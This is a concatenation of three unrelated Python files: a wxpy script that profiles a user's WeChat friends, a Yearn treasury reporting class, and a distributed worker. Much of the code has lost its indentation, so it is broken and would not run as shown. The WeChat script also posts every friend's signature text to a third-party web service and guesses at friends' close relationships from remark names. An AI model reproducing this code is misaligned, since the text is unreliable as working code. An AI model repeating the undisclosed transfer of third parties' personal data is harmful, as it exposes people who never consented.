# -*- coding:utf-8 -*-
from wxpy import *
from platform import system
from os.path import exists
from os import makedirs
from os import listdir
from shutil import rmtree
from queue import Queue
from threading import Thread
from time import sleep
from pyecharts import Pie
from pyecharts import Map
from pyecharts import WordCloud
from pyecharts import Bar
from requests import post
import PIL.Image as Image
import re
import random
import math
from cv2 import CascadeClassifier
from cv2 import imread
from cv2 import cvtColor
from cv2 import COLOR_BGR2GRAY
# Libraries used to open the generated report file
# Windows differs from Linux and Mac OSX here
# lambda defines an anonymous function, similar in spirit to a C #define
if ('Windows' in system()):
# Windows
from os import startfile
open_html = lambda x: startfile(x)
elif ('Darwin' in system()):
# MacOSX
from subprocess import call
open_html = lambda x: call(["open", x])
else:
# Linux
from subprocess import call
open_html = lambda x: call(["xdg-open", x])
# Analyse the gender ratio of friends
def sex_ratio():
    # Initialise counters
    male, female, other = 0, 0, 0
    # Iterate over all friends
for user in friends:
if (user.sex == 1):
male += 1
elif (user.sex == 2):
female += 1
else:
other += 1
name_list = ['男性', '女性', '未设置']
num_list = [male, female, other]
pie = Pie("微信好友性别比例")
pie.add("", name_list, num_list, is_label_show=True)
pie.render('data/好友性别比例.html')
# Analyse the regional distribution of friends
def region_distribution():
    # Use a dict to count friends per province
province_dict = {'北京': 0, '上海': 0, '天津': 0, '重庆': 0,
'河北': 0, '山西': 0, '吉林': 0, '辽宁': 0, '黑龙江': 0,
'陕西': 0, '甘肃': 0, '青海': 0, '山东': 0, '福建': 0,
'浙江': 0, '台湾': 0, '河南': 0, '湖北': 0, '湖南': 0,
'江西': 0, '江苏': 0, '安徽': 0, '广东': 0, '海南': 0,
'四川': 0, '贵州': 0, '云南': 0, '内蒙古': 0, '新疆': 0,
'宁夏': 0, '广西': 0, '西藏': 0, '香港': 0, '澳门': 0}
    # Iterate over all friends
    for user in friends:
        # Only count provinces we know about; friends from abroad are ignored
if (user.province in province_dict):
key = user.province
province_dict[key] += 1
province = list(province_dict.keys())
values = list(province_dict.values())
    # maptype='china' only shows provinces and municipalities, so the data must use their names
map = Map("微信好友地区分布")
map.add("", province, values, visual_range=[0, 50], maptype='china', is_visualmap=True, visual_text_color='#000')
map.render(path="data/好友地区分布.html")
    # Look more closely at the province with the most friends
max_count_province = ''
for key, value in province_dict.items():
if (value == max(province_dict.values())):
max_count_province = key
break
    # Use a dict to count friends per city
    city_dict = {}
    # Iterate over all friends
for user in friends:
if (user.province == max_count_province):
            # Update the key/value pair
if (user.city in city_dict.keys()):
city_dict[user.city] += 1
else:
city_dict[user.city] = 1
bar = Bar(max_count_province + '中,好友地区分布')
bar.add(name='地区分布', x_axis=[x for x in city_dict.keys()], y_axis=[x for x in city_dict.values()])
bar.render('data/某省好友地区分布.html')
# Work out what fraction of your friends you actually know
def statistics_friends():
    # Initialise counters
    unknown, known_male, known_female, known_other = 0, 0, 0, 0
    # Iterate over all friends
    for user in friends:
        # The remark name is not empty
if ((user.remark_name).strip()):
if (user.sex == 1):
known_male += 1
elif (user.sex == 2):
known_female += 1
else:
known_other += 1
else:
unknown += 1
name_list = ['未设置备注的好友', '设置备注的男性好友', '设置备注的女性好友', '设置备注的其他好友']
num_list = [unknown, known_male, known_female, known_other]
pie = Pie("你认识的好友比例", title_pos='center')
pie.add("", name_list, num_list, is_label_show=True, legend_orient="vertical", legend_pos="left")
pie.render('data/你认识的好友比例.html')
# Analyse remark names
def analyze_remark_name():
close_partner_dict = {'宝宝,猪,仙女,亲爱,老婆': 0, '老公': 0, '父亲,爸': 0, '母亲,妈': 0, '闺蜜,死党,基友': 0}
    # Iterate over the friend data
    for user in friends:
        for key in close_partner_dict.keys():
            # Check whether this friend's remark name contains any key of close_partner_dict
name = key.split(',')
for sub_name in name:
if (sub_name in user.remark_name):
close_partner_dict[key] += 1
break
name_list = ['最重要的她', '最重要的他', '爸爸', '妈妈', '死党']
num_list = [x for x in close_partner_dict.values()]
pie = Pie("可能是你最亲密的人")
pie.add("", name_list, num_list, is_label_show=True, is_legend_show=False)
pie.render('data/你最亲密的人.html')
# Analyse personal signatures
def analyze_signature():
    # List of personal signatures
data = []
for user in friends:
        # Strip WeChat emoji from the signature, i.e. <span class.*?</span>
        # Regex search-and-replace: user.signature is the source text and every <span class.*?</span> is replaced with an empty string
        new_signature = re.sub(re.compile(r"<span class.*?</span>", re.S), "", user.signature)
        # Keep only single-line signatures; multi-line ones are filtered out
if (len(new_signature.split('\n')) == 1):
data.append(new_signature)
    # Join the signature list into a single string
    data = '\n'.join(data)
    # Word segmentation is done by calling a web API
    # jieba or snownlp is not used here because the result either cannot be packaged into an exe or the packaged file becomes very large
postData = {'data': data, 'type': 'exportword', 'arg': '', 'beforeSend': 'undefined'}
response = post('http://life.chacuo.net/convertexportword', data=postData)
data = response.text.replace('{"status":1,"info":"ok","data":["', '')
    # Decode
data = data.encode('utf-8').decode('unicode_escape')
    # Turn the returned JSON string of segmentation results into a Python object and tidy it up
data = data.split("=====================================")[0]
    # Convert the segmentation result into a list; entries are separated by two spaces
data = data.split(' ')
    # Drop meaningless words from the segmentation result
stop_words_list = [',', ',', '、', 'the', 'a', 'is', '…', '·', 'э', 'д', 'э', 'м', 'ж', 'и', 'л', 'т', 'ы', 'н', 'з',
'м', '…', '…', '…', '…', '…', '、', '.', '。', '!', '!', ':', ':', '~', '|', '▽', '`', 'ノ', '♪',
'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's',
't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L',
'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4',
'5', '6', '7', '8', '9', '\'', '‘', '’', '“', '”', '的', '了', '是', '你', '我', '他', '她', '=', '\r',
'\n', '\r\n', '\t', '以下关键词', '[', ']', '{', '}', '(', ')', '(', ')', 'span', '<', '>', 'class',
'html', '?', '就', '于', '下', '在', '吗', '嗯']
tmp_data = []
for word in data:
if (word not in stop_words_list):
tmp_data.append(word)
data = tmp_data
    # Count word frequencies into the dict signature_dict
signature_dict = {}
for index, word in enumerate(data):
print(u'正在统计好友签名数据,进度%d/%d,请耐心等待……' % (index + 1, len(data)))
if (word in signature_dict.keys()):
signature_dict[word] += 1
else:
signature_dict[word] = 1
    # Draw the word cloud
name = [x for x in signature_dict.keys()]
value = [x for x in signature_dict.values()]
wordcloud = WordCloud('微信好友个性签名词云图')
wordcloud.add("", name, value, shape='star', word_size_range=[1, 100])
wordcloud.render('data/好友个性签名词云.html')
# Download friends' avatars; this step takes a fairly long time
def download_head_image(thread_name):
    # While the queue is not empty
while (not queue_head_image.empty()):
        # Take one friend off the queue
        user = queue_head_image.get()
        # Download this friend's avatar and save it under a random 15-digit file name
random_file_name = ''.join([str(random.randint(0, 9)) for x in range(15)])
user.get_avatar(save_path='image/' + random_file_name + '.jpg')
        # Progress output
print(
u'线程%d:正在下载微信好友头像数据,进度%d/%d,请耐心等待……' % (thread_name, len(friends) - queue_head_image.qsize(), len(friends)))
# Generate an html file and save it to file_name
def generate_html(file_name):
with open(file_name, 'w', encoding='utf-8') as f:
data = '''
<meta http-equiv='Content-Type' content='text/html; charset=utf-8'>
<meta charset="UTF-8">
<title>一键生成微信个人专属数据报告(了解你的微信社交历史)</title>
<meta name='keywords' content='微信个人数据'>
<meta name='description' content=''>
<iframe name="iframe1" marginwidth=0 marginheight=0 width=100% height=60% src="data/好友地区分布.html" frameborder=0></iframe>
<iframe name="iframe2" marginwidth=0 marginheight=0 width=100% height=60% src="data/某省好友地区分布.html" frameborder=0></iframe>
<iframe name="iframe3" marginwidth=0 marginheight=0 width=100% height=60% src="data/好友性别比例.html" frameborder=0></iframe>
<iframe name="iframe4" marginwidth=0 marginheight=0 width=100% height=60% src="data/你认识的好友比例.html" frameborder=0></iframe>
<iframe name="iframe5" marginwidth=0 marginheight=0 width=100% height=60% src="data/你最亲密的人.html" frameborder=0></iframe>
<iframe name="iframe6" marginwidth=0 marginheight=0 width=100% height=60% src="data/特殊好友分析.html" frameborder=0></iframe>
<iframe name="iframe7" marginwidth=0 marginheight=0 width=100% height=60% src="data/共同所在群聊分析.html" frameborder=0></iframe>
<iframe name="iframe8" marginwidth=0 marginheight=0 width=100% height=60% src="data/好友个性签名词云.html" frameborder=0></iframe>
<iframe name="iframe9" marginwidth=0 marginheight=0 width=100% height=60% src="data/微信好友头像拼接图.html" frameborder=0></iframe>
<iframe name="iframe10" marginwidth=0 marginheight=0 width=100% height=60% src="data/使用人脸的微信好友头像拼接图.html" frameborder=0></iframe>
'''
f.write(data)
# Initialise the required folders
def init_folders():
if (not (exists('image'))):
makedirs('image')
else:
rmtree('image')
makedirs('image')
if (not (exists('data'))):
makedirs('data')
else:
rmtree('data')
makedirs('data')
# Stitch all WeChat friend avatars into one image
def merge_head_image():
    # Stitch the avatars together
    pics = listdir('image')  # all files in the image directory, i.e. the avatars
    numPic = len(pics)
    eachsize = int(math.sqrt(float(640 * 640) / numPic))  # side length of each square avatar; increase it if it looks too small
    numrow = int(640 / eachsize)
    numcol = int(numPic / numrow)  # floor division
    toImage = Image.new('RGB', (eachsize * numrow, eachsize * numcol))  # blank canvas for the avatar grid
    x = 0  # column index (top-left x) of the avatar being pasted
    y = 0  # row index (top-left y) of the avatar being pasted
for index, i in enumerate(pics):
print(u'正在拼接微信好友头像数据,进度%d/%d,请耐心等待……' % (index + 1, len(pics)))
try:
            # Open the image
img = Image.open('image/' + i)
except IOError:
print(u'Error: 没有找到文件或读取文件失败')
else:
            # Shrink the image
            img = img.resize((eachsize, eachsize), Image.ANTIALIAS)
            # Paste the image onto the canvas
toImage.paste(img, (x * eachsize, y * eachsize))
x += 1
if x == numrow:
x = 0
y += 1
toImage.save('data/拼接' + ".jpg")
    # Generate a web page
with open('data/微信好友头像拼接图.html', 'w', encoding='utf-8') as f:
data = '''
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv='Content-Type' content='text/html; charset=utf-8'>
<meta charset="utf-8" />
<title>微信好友头像拼接图</title>
</head>
<body>
<p><font size=4px><strong>微信好友头像拼接图</strong></font></p>
<img src="拼接.jpg" />
</body>
</html>
'''
f.write(data)
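# Worked example of the grid maths in merge_head_image above (numbers are
# illustrative): with 100 avatars, eachsize = int(sqrt(640*640/100)) = 64 px,
# numrow = 640 // 64 = 10 avatars per row and numcol = 100 // 10 = 10 rows, so
# every avatar is resized to 64x64 and pasted at (x*64, y*64) on a 640x640 canvas.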
# Count friends whose avatar shows a real human face
def detect_human_face():
    # All file names in the image directory, i.e. the avatars
    pics = listdir('image')
    # Number of avatars that contain a face
    count_face_image = 0
    # File names of avatars that contain a face
    list_name_face_image = []
    # Load the face detection model
face_cascade = CascadeClassifier('E:\PyCharmSpace\Python-X\cn\wechatreport\model\haarcascade_frontalface_default.xml')
for index, file_name in enumerate(pics):
print(u'正在进行人脸识别,进度%d/%d,请耐心等待……' % (index + 1, len(pics)))
        # Read the image
        img = imread('image/' + file_name)
        # Skip images that could not be read
if img is None:
continue
        # Convert the image to grayscale
        gray = cvtColor(img, COLOR_BGR2GRAY)
        # Run the actual face detection; scaleFactor and minNeighbors control how much the image is scaled each iteration and how many neighbours a detection needs
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
if (len(faces) > 0):
count_face_image += 1
list_name_face_image.append(file_name)
print(u'使用人脸的头像%d/%d' % (count_face_image, len(pics)))
    # Stitch together the avatars that contain a face
    pics = list_name_face_image
    numPic = len(pics)
    eachsize = int(math.sqrt(float(640 * 640) / numPic))  # side length of each square avatar; increase it if it looks too small
    numrow = int(640 / eachsize)
    numcol = int(numPic / numrow)  # floor division
    toImage = Image.new('RGB', (eachsize * numrow, eachsize * numcol))  # blank canvas for the avatar grid
    x = 0  # column index (top-left x) of the avatar being pasted
    y = 0  # row index (top-left y) of the avatar being pasted
for index, i in enumerate(pics):
print(u'正在拼接使用人脸的微信好友头像数据,进度%d/%d,请耐心等待……' % (index + 1, len(pics)))
try:
            # Open the image
img = Image.open('image/' + i)
except IOError:
print(u'Error: 没有找到文件或读取文件失败')
else:
            # Shrink the image
            img = img.resize((eachsize, eachsize), Image.ANTIALIAS)
            # Paste the image onto the canvas
toImage.paste(img, (x * eachsize, y * eachsize))
x += 1
if x == numrow:
x = 0
y += 1
toImage.save('data/使用人脸的拼接' + ".jpg")
    # Generate a web page
with open('data/使用人脸的微信好友头像拼接图.html', 'w', encoding='utf-8') as f:
data = '''
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv='Content-Type' content='text/html; charset=utf-8'>
<meta charset="utf-8" />
<title>使用人脸的微信好友头像拼接图</title>
</head>
<body>
<p><font size=4px><strong>描述内容</strong></font></p>
<img src="使用人脸的拼接.jpg" />
</body>
</html>
'''
data = data.replace('描述内容', '在{}个好友中,有{}个好友使用真实的人脸作为头像'.format(len(friends), count_face_image))
f.write(data)
# Special friends analysis
def analyze_special_friends():
    # Starred friends (important people), friends who cannot see my Moments, friends whose Moments I do not see, pinned friends, strangers
    star_friends, hide_my_post_friends, hide_his_post_friends, sticky_on_top_friends, stranger_friends = 0, 0, 0, 0, 0
    for user in friends:
        # StarFriend is 1 for starred friends and 0 otherwise; contacts without the key are strangers
if ('StarFriend' in (user.raw).keys()):
if ((user.raw)['StarFriend'] == 1):
star_friends += 1
else:
stranger_friends += 1
        # Friend type and permission flags: 1 and 3 are normal friends; 259 and 33027 cannot see my Moments; 65539, 65537 and 66051 I do not see their Moments; 65795 both restrictions; 73731 stranger
if ((user.raw)['ContactFlag'] in [259, 33027, 65795]):
hide_my_post_friends += 1
if ((user.raw)['ContactFlag'] in [66051, 65537, 65539, 65795]):
hide_his_post_friends += 1
        # Pinned friends have flag 2051
        if ((user.raw)['ContactFlag'] in [2051]):
            sticky_on_top_friends += 1
        # Strangers
if ((user.raw)['ContactFlag'] in [73731]):
stranger_friends += 1
bar = Bar('特殊好友分析')
bar.add(name='', x_axis=['星标', '不让他看我朋友圈', '不看他朋友圈', '消息置顶', '陌生人'],
y_axis=[star_friends, hide_my_post_friends, hide_his_post_friends, sticky_on_top_friends, stranger_friends],
legend_orient="vertical", legend_pos="left")
bar.render('data/特殊好友分析.html')
# Analyse group chats shared with each friend
def group_common_in():
    # Get all active group chats
    groups = bot.groups()
    # Number of group chats each friend shares with you
dict_common_in = {}
    # Iterate over all friends; index 0 is yourself, so skip it
    for x in friends[1:]:
        # Search each group chat in turn
for y in groups:
            # x is a member of y
            if (x in y):
                # Get the WeChat nickname
                name = x.nick_name
                # Use the remark name instead if one is set
if (x.remark_name and x.remark_name != ''):
name = x.remark_name
                # Increment the count
if (name in dict_common_in.keys()):
dict_common_in[name] += 1
else:
dict_common_in[name] = 1
    # Take the top-n entries from dict_common_in
n = 0
if (len(dict_common_in) > 5):
n = 6
elif (len(dict_common_in) > 4):
n = 5
elif (len(dict_common_in) > 3):
n = 4
elif (len(dict_common_in) > 2):
n = 3
elif (len(dict_common_in) > 1):
n = 2
elif (len(dict_common_in) > 0):
n = 1
    # Sort and convert to a list
    sort_list = sorted(dict_common_in.items(), key=lambda item: item[1], reverse=True)
    # Keep the n largest entries
sort_list = sort_list[:n]
bar = Bar('共同所在群聊分析')
bar.add(name='', x_axis=[x[0] for x in sort_list], y_axis=[x[1] for x in sort_list], legend_orient="vertical",
legend_pos="left")
bar.render('data/共同所在群聊分析.html')
# Before running, make sure the required libraries are installed
# If they are not, install them with: pip install -r requirement.txt
if __name__ == '__main__':
    # Initialise the required folders
    init_folders()
    # Start the WeChat bot; the command differs per operating system
if ('Windows' in system()):
# Windows
bot = Bot()
elif ('Darwin' in system()):
# MacOSX
bot = Bot(cache_path=True)
elif ('Linux' in system()):
# Linux
bot = Bot(console_qr=2, cache_path=True)
else:
        # Unknown operating system, configure it yourself
print(u"无法识别你的操作系统类型,请自己设置")
exit()
    # Fetch friend data
print(u'正在获取微信好友数据信息,请耐心等待……')
friends = bot.friends(update=False)
# i.nick_name, i.remark_name, i.sex, i.province, i.city, i.signature
print(u'微信好友数据信息获取完毕\n')
print(u'正在分析你的群聊,请耐心等待……')
group_common_in()
print(u'分析群聊完毕\n')
print(u'正在获取微信好友头像信息,请耐心等待……')
    # Create a queue so avatars can be downloaded from several threads, which speeds things up
    queue_head_image = Queue()
    # Put every friend into the queue
    # For easier debugging you can insert only a few entries, e.g. friends[1:10]
for user in friends:
queue_head_image.put(user)
    # Start a pool of threads to download the avatars
for i in range(1, 10):
t = Thread(target=download_head_image, args=(i,))
t.start()
print(u'微信好友头像信息获取完毕\n')
print(u'正在分析好友性别比例,请耐心等待……')
sex_ratio()
print(u'分析好友性别比例完毕\n')
print(u'正在分析好友地区分布,请耐心等待……')
region_distribution()
print(u'分析好友地区分布完毕\n')
print(u'正在统计你认识的好友,请耐心等待……')
statistics_friends()
print(u'统计你认识的好友完毕\n')
print(u'正在分析你最亲密的人,请耐心等待……')
analyze_remark_name()
print(u'分析你最亲密的人完毕\n')
print(u'正在分析你的特殊好友,请耐心等待……')
analyze_special_friends()
print(u'分析你的特殊好友完毕\n')
print(u'正在分析你的好友的个性签名,请耐心等待……')
analyze_signature()
print(u'分析你的好友的个性签名完毕\n')
    # Avatar downloads run in several threads and may take a while,
    # so wait for them to finish before the avatar-based steps below
while (not queue_head_image.empty()):
sleep(1)
print(u'正在拼接所有微信好友头像数据,请耐心等待……')
merge_head_image()
print(u'拼接所有微信好友头像数据完毕\n')
print(u'正在检测使用人脸作为头像的好友数量,请耐心等待……')
detect_human_face()
print(u'检测使用人脸作为头像的好友数量完毕\n')
    # Generate the final html report
print(u'所有数据获取完毕,正在生成微信个人数据报告,请耐心等待……')
generate_html('微信个人数据报告.html')
print(u'生成微信个人数据报告完毕,该文件为当前目录下的[微信个人数据报告.html]\n')
    # Open the html report with the system default handler
print(u'已为你自动打开 微信个人数据报告.html')
open_html('微信个人数据报告.html')
|
treasury.py
|
import logging
import threading
import time
from brownie import Contract, chain, web3
from brownie.network.event import EventLookupError
from eth_abi import encode_single
from joblib import Parallel, delayed
from yearn.events import create_filter, decode_logs
from yearn.multicall2 import fetch_multicall
from yearn.outputs import victoria
from yearn.partners.partners import partners
from yearn.partners.snapshot import WildcardWrapper, Wrapper
from yearn.prices.constants import weth
from yearn.prices.magic import PriceError, get_price
from ..constants import TREASURY_WALLETS
logger = logging.getLogger(__name__)
def _get_price(token, block=None):
SKIP_PRICE = ["0xa9517B2E61a57350D6555665292dBC632C76adFe","0xb07de4b2989E180F8907B8C7e617637C26cE2776"] # shitcoins
try:
return get_price(token, block, silent=True)
except AttributeError:
if token not in SKIP_PRICE:
logger.warn(f"AttributeError while getting price for {Contract(token).symbol()} {token}")
return 0
except PriceError:
if token not in SKIP_PRICE:
logger.warn(f"PriceError while getting price for {Contract(token).symbol()} {token}")
return 0
except ValueError:
if token not in SKIP_PRICE:
logger.warn(f"ValueError while getting price for {Contract(token).symbol()} {token}")
return 0
def get_token_from_event(event):
try:
return event['Transfer'][0].address
except EventLookupError:
logger.critical(f'One of your cached contracts has an incorrect definition: {event.address}. Please fix this manually')
        raise ValueError(f'One of your cached contracts has an incorrect definition: {event.address}. Please fix this manually')
class Treasury:
'''
Used to export Yearn financial reports
'''
def __init__(self, watch_events_forever = False):
self.addresses = list(TREASURY_WALLETS)
self._transfers = []
self._topics_in = [
'0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef',
None,
['0x000000000000000000000000' + address[2:] for address in self.addresses]
] # Transfers into Yearn wallets
self._topics_out = [
'0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef',
['0x000000000000000000000000' + address[2:] for address in self.addresses]
] # Transfers out of Yearn wallets
self._watch_events_forever = watch_events_forever
self._done = threading.Event()
self._thread = threading.Thread(target=self.watch_transfers, daemon=True)
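        # Example of the topic padding above (wallet address is illustrative):
        # the ERC-20 Transfer event indexes `from` and `to` as 32-byte topics,
        # so a 20-byte wallet such as
        # 0xfeb4acf3df3cdea7399794d0869ef76a6efaff52 is left-padded to
        # '0x000000000000000000000000feb4acf3df3cdea7399794d0869ef76a6efaff52'
        # before being used as a filter value.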
# descriptive functions
# assets
def assets(self, block=None) -> dict:
assets = self.held_assets(block=block)
assets.update(self.collateral(block=block))
return assets
def token_list(self, address, block=None) -> list:
self.load_transfers()
if block:
return list({get_token_from_event(transfer) for transfer in self._transfers if transfer['Transfer'].values()[1] == address and transfer['Transfer'][0].block_number <= block})
else:
return list({get_token_from_event(transfer) for transfer in self._transfers if transfer['Transfer'].values()[1] == address})
def held_assets(self,block=None) -> dict:
balances = {}
for address in self.addresses:
# get token balances
tokens = self.token_list(address,block=block)
token_balances = fetch_multicall(*[[Contract(token),"balanceOf",address] for token in tokens], block=block)
decimals = fetch_multicall(*[[Contract(token),"decimals"] for token in tokens], block=block)
token_balances = [balance / 10 ** decimal if decimal else 0 for balance, decimal in zip(token_balances,decimals)]
token_prices = Parallel(8,'threading')(delayed(_get_price)(token,block) for token in tokens)
token_balances = [{'balance': balance, 'usd value': balance * price} for balance, price in zip(token_balances, token_prices)]
balances[address] = dict(zip(tokens,token_balances))
# then, add eth
if block:
balance = web3.eth.get_balance(address, block_identifier = block) / 10 ** 18
else:
balance = web3.eth.get_balance(address) / 10 ** 18
balances[address]['ETH'] = {'balance': balance, 'usd value': balance * get_price(weth, block)}
return balances
def collateral(self, block=None) -> dict:
collateral = {
'MakerDAO': self.maker_collateral(block=block),
}
if block is None or block >= 11315910:
collateral['Unit.xyz'] = self.unit_collateral(block=block)
return collateral
def maker_collateral(self, block=None) -> dict:
proxy_registry = Contract('0x4678f0a6958e4D2Bc4F1BAF7Bc52E8F3564f3fE4')
cdp_manager = Contract('0x5ef30b9986345249bc32d8928B7ee64DE9435E39')
#ychad = Contract('ychad.eth')
ychad = Contract('0xfeb4acf3df3cdea7399794d0869ef76a6efaff52')
vat = Contract('0x35D1b3F3D7966A1DFe207aa4514C12a259A0492B')
proxy = proxy_registry.proxies(ychad)
cdp = cdp_manager.first(proxy)
urn = cdp_manager.urns(cdp)
ilk = encode_single('bytes32', b'YFI-A')
ink = vat.urns(ilk, urn, block_identifier = block).dict()["ink"]
yfi = "0x0bc529c00C6401aEF6D220BE8C6Ea1667F6Ad93e"
collateral = {
yfi: {
'balance': ink / 10 ** 18,
'usd value': ink / 10 ** 18 * get_price(yfi, block) if ink > 0 else 0
}
}
return collateral
def unit_collateral(self, block=None) -> dict:
if block and block < 11315910:
return
#ychad = Contract('ychad.eth')
ychad = Contract('0xfeb4acf3df3cdea7399794d0869ef76a6efaff52')
unitVault = Contract("0xb1cff81b9305166ff1efc49a129ad2afcd7bcf19")
yfi = "0x0bc529c00C6401aEF6D220BE8C6Ea1667F6Ad93e"
bal = unitVault.collaterals(yfi,ychad, block_identifier = block)
collateral = {
yfi: {
'balance': bal / 10 ** 18,
'usd value': bal / 10 ** 18 * get_price(yfi, block)
}
}
return collateral
#def bonded_kp3r(self, block=None) -> dict:
# descriptive functions
# debt
def debt(self, block=None) -> dict:
debt = {
'MakerDAO': self.maker_debt(block=block),
}
if not block or block >= 11315910:
debt['Unit.xyz'] = self.unit_debt(block=block)
#self.accounts_payable()
return debt
def accounts_payable(self, block=None) -> dict:
for i, partner in enumerate(partners):
if i == 1:
flat_wrappers = []
for wrapper in partner.wrappers:
if isinstance(wrapper, Wrapper):
flat_wrappers.append(wrapper)
elif isinstance(wrapper, WildcardWrapper):
flat_wrappers.extend(wrapper.unwrap())
for wrapper in flat_wrappers:
print(wrapper.protocol_fees(block=block))
def maker_debt(self, block=None) -> dict:
proxy_registry = Contract('0x4678f0a6958e4D2Bc4F1BAF7Bc52E8F3564f3fE4')
cdp_manager = Contract('0x5ef30b9986345249bc32d8928B7ee64DE9435E39')
#ychad = Contract('ychad.eth')
ychad = Contract('0xfeb4acf3df3cdea7399794d0869ef76a6efaff52')
vat = Contract('0x35D1b3F3D7966A1DFe207aa4514C12a259A0492B')
proxy = proxy_registry.proxies(ychad)
cdp = cdp_manager.first(proxy)
urn = cdp_manager.urns(cdp)
ilk = encode_single('bytes32', b'YFI-A')
art = vat.urns(ilk, urn, block_identifier = block).dict()["art"]
rate = vat.ilks(ilk, block_identifier = block).dict()["rate"]
debt = art * rate / 1e27
dai = '0x6B175474E89094C44Da98b954EedeAC495271d0F'
debt = {
dai: {
'balance': debt / 10 ** 18,
'usd value': debt / 10 ** 18
}
}
return debt
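    # Worked example of the Maker units above (illustrative numbers): art is
    # the normalised debt in wad (1e18) and rate is the accumulated
    # stability-fee multiplier in ray (1e27), so with art = 1_000_000 * 1e18
    # and rate = 1.05e27 the outstanding DAI is 1_000_000 * 1.05 = 1_050_000,
    # which is what art * rate / 1e27 followed by the / 10 ** 18 above computes.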
def unit_debt(self, block=None) -> dict:
if block and block < 11315910:
return
#ychad = Contract('ychad.eth')
ychad = Contract('0xfeb4acf3df3cdea7399794d0869ef76a6efaff52')
unitVault = Contract("0xb1cff81b9305166ff1efc49a129ad2afcd7bcf19")
yfi = "0x0bc529c00C6401aEF6D220BE8C6Ea1667F6Ad93e"
usdp = '0x1456688345527bE1f37E9e627DA0837D6f08C925'
debt = unitVault.getTotalDebt(yfi,ychad, block_identifier = block)
debt = {
usdp: {
'balance': debt / 10 ** 18,
'usd value': debt / 10 ** 18
}
}
return debt
# helper functions
def load_transfers(self):
if not self._thread._started.is_set():
self._thread.start()
self._done.wait()
def watch_transfers(self):
start = time.time()
logger.info('pulling treasury transfer events, please wait patiently this takes a while...')
self.log_filter_in = create_filter(None, topics=self._topics_in)
self.log_filter_out = create_filter(None, topics=self._topics_out)
for block in chain.new_blocks(height_buffer=12):
logs = self.log_filter_in.get_new_entries()
self.process_transfers(logs)
logs = self.log_filter_out.get_new_entries()
self.process_transfers(logs)
if not self._done.is_set():
self._done.set()
logger.info("loaded treasury transfer events in %.3fs", time.time() - start)
if not self._watch_events_forever:
break
time.sleep(300)
def process_transfers(self, logs):
for log in logs:
try:
event = decode_logs([log]) # NOTE: We have to decode logs here because silly SHIBAS token prevents us from batch decoding logs
self._transfers.append(event)
except:
if log.address == '0xeF81c2C98cb9718003A89908e6bd1a5fA8A098A3':
print('skipping spaceshiba token, logs are formed weird')
else:
print('unable to decode logs, figure out why')
print(log)
# export functions
def describe(self, block) -> dict:
return {
'assets': self.assets(block),
'debt': self.debt(block)
}
def export(self, block, ts):
start = time.time()
data = self.describe(block)
victoria.export_treasury(ts, data)
logger.info('exported block=%d took=%.3fs', block, time.time() - start)
|
worker.py
|
import threading, time, sys, getopt, queue
from debug_utils import *
from commer import CommerOnWorker, LISTEN_IP
from msg import result_from_req, InfoType, Info
from plot import plot_worker
class Worker():
def __init__(self, _id):
self._id = _id
self.msg_q = queue.Queue()
# self.epoch__num_req_l = []
self.commer = CommerOnWorker(self._id, self.handle_msg)
self.on = True
self.msg_to_send_q = queue.Queue()
t_send = threading.Thread(target=self.run_send, daemon=True)
t_send.start()
self.probe_to_send_q = queue.Queue()
t_send_probe = threading.Thread(target=self.run_send_probe, daemon=True)
t_send_probe.start()
t = threading.Thread(target=self.run, daemon=True)
t.start()
t.join()
def close(self):
log(DEBUG, "started")
self.commer.close()
self.msg_q.put(None)
self.probe_to_send_q.put(None)
self.msg_to_send_q.put(None)
self.on = False
log(DEBUG, "done")
def handle_msg(self, msg):
if msg.payload.is_info() and msg.payload.typ == InfoType.close:
self.close()
elif msg.payload.is_req():
self.msg_q.put(msg)
# self.epoch__num_req_l.append((time.time(), self.msg_q.qsize()))
def run(self):
while self.on:
msg = self.msg_q.get(block=True)
if msg is None:
log(DEBUG, "recved close signal")
self.close()
return
# TODO: real processing goes in here
req = msg.payload
if not req.probe:
log(DEBUG, "serving/sleeping", serv_time=req.serv_time)
time.sleep(req.serv_time)
log(DEBUG, "finished serving")
# self.epoch__num_req_l.append((time.time(), self.msg_q.qsize()))
msg.payload = Info(req._id, InfoType.worker_req_completion)
self.commer.send_info_to_master(msg)
result = result_from_req(req)
result.epoch_departed_cluster = time.time()
# result.size_inBs = ?
msg.payload = result
if not req.probe:
self.msg_to_send_q.put(msg)
else:
self.probe_to_send_q.put(msg)
plot_worker(self)
def run_send_probe(self):
while self.on:
msg = self.probe_to_send_q.get(block=True)
if msg is None:
log(DEBUG, "got close signal")
return
serv_time = msg.payload.serv_time
log(DEBUG, "sleeping for probe", serv_time=serv_time)
time.sleep(serv_time)
log(DEBUG, "done sleeping for probe")
self.msg_to_send_q.put(msg)
def run_send(self):
while self.on:
msg = self.msg_to_send_q.get(block=True)
if msg is None:
log(DEBUG, "got close signal")
return
self.commer.send_result_to_user(msg)
def parse_argv(argv):
m = {}
try:
opts, args = getopt.getopt(argv, '', ['i=', 'log_to_std='])
except getopt.GetoptError:
assert_("Wrong args;", opts=opts, args=args)
for opt, arg in opts:
if opt == '--log_to_std':
m['log_to_std'] = bool(int(arg))
elif opt == '--i':
m['i'] = arg
else:
assert_("Unexpected opt= {}, arg= {}".format(opt, arg))
if 'log_to_std' not in m:
m['log_to_std'] = True
if 'i' not in m:
m['i'] = LISTEN_IP
return m
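# Hedged invocation example (the IP below is illustrative): start a worker that
# listens on 10.0.0.5 and mirrors its log to stdout, matching the '--i' and
# '--log_to_std' options parsed above.
#   python worker.py --i=10.0.0.5 --log_to_std=1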
if __name__ == '__main__':
m = parse_argv(sys.argv[1:])
_id = 'w_' + m['i']
log_to_file('{}.log'.format(_id))
if m['log_to_std']:
log_to_std()
w = Worker(_id)
# input("Enter to finish...\n")
# sys.exit()
|
botal.py
|
